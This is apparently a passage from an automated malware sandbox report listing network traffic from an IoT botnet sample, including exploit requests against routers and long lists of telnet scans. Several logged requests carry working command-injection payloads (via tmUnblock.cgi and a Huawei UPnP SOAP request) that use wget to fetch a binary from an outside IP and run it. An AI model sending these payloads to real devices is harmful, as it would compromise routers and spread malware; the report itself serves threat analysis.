6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 40.80.161.249:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 121.231.104.136:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 187.60.63.34:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 245.193.59.104:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 247.93.196.107:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 63.212.12.171:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 251.165.40.173:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 240.21.237.107:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 45.168.1.65:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 87.134.39.214:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 161.249.42.69:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 97.9.249.197:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 133.137.222.108:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 195.42.212.102:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 139.215.200.148:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 81.2.1.98:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 204.95.82.133:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 243.221.99.196:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 136.143.18.105:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 58.26.82.252:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 177.77.47.245:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 8.246.54.155:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 75.183.193.24:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 120.182.158.221:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 162.109.196.242:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 130.36.11.213:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 183.87.152.111:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 78.50.32.239:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 197.167.4.61:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 121.136.205.168:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 119.1.12.15:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 141.98.115.5:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 106.29.76.98:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 67.222.195.103:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 158.200.56.51:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 73.170.179.220:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 117.6.225.223:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 139.150.10.108:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 240.181.62.185:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 96.144.50.232:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 122.220.184.170:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 46.182.244.244:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 151.198.116.230:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 91.247.164.31:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 104.95.104.153:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 79.44.80.186:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 2.224.229.49:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 161.224.101.181:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 70.176.242.204:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 158.226.84.240:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 189.218.18.18:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 46.241.102.37:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 118.3.213.35:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 122.121.254.226:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 80.101.217.38:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 84.178.85.39:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 165.54.219.65:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 53.59.118.1:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 130.216.147.230:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 194.229.32.195:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 68.146.128.54:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 152.20.150.216:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 86.145.187.56:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 66.139.221.128:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 75.217.174.44:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 193.100.198.115:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 166.81.214.161:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 83.30.125.220:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 200.96.80.141:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 181.169.166.177:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 8.103.54.81:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 101.227.8.165:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 174.239.88.236:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 113.136.110.106:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 207.63.186.197:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 92.200.117.221:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 180.134.182.113:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 204.16.107.79:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 181.11.21.129:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 197.147.51.152:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 242.112.209.233:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 187.129.56.188:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 181.91.156.130:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 78.133.139.114:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 182.17.161.91:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 36.144.67.54:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 207.148.238.66:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 96.105.74.86:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 45.154.206.199:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 38.236.56.2:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 208.202.206.157:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 24.235.146.83:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57632 -> 195.82.116.135:2323 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.72.161.249:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.81.254.249:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.103.171.156:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.9.76.172:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.195.202.246:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.248.243.83:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.214.195.172:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.178.240.244:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.126.41.162:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.18.15.227:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.205.13.47:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.243.165.219:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.158.206.90:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.180.61.7:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.64.168.116:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.74.57.203:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.70.8.30:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.150.128.73:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.216.210.109:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.247.15.247:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.110.55.232:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.61.91.225:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.104.117.129:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.100.145.167:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.86.193.45:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.67.56.36:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.20.146.12:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.49.83.76:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.106.87.87:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.151.131.140:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.132.139.37:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.169.243.215:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.70.206.246:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.170.199.94:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.14.93.190:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.65.48.82:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.82.202.196:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.252.42.136:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.73.140.21:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.173.25.181:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.197.226.28:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.190.90.184:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.30.54.29:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.153.174.66:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.208.42.65:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.142.33.211:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.123.116.77:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.28.135.154:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.130.123.84:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.188.118.177:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.150.133.57:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.59.91.164:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.191.18.54:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.173.79.149:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.169.64.175:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.215.209.220:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.179.42.40:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.190.131.78:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.221.249.243:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.209.77.214:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.78.110.110:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.197.51.32:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.39.226.47:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.157.49.92:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.216.172.29:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.134.254.160:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.120.4.45:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.131.239.205:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.117.32.72:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.52.62.94:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.246.17.35:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.27.142.3:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.73.140.250:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.249.165.147:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.161.249.127:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.86.71.120:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.87.214.28:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.173.211.31:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.204.219.253:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.88.91.116:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.56.226.49:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.172.137.121:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.221.157.169:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.194.91.127:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.60.161.98:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.64.216.189:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.16.16.121:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.116.253.79:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.193.111.137:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.171.143.252:52869 |
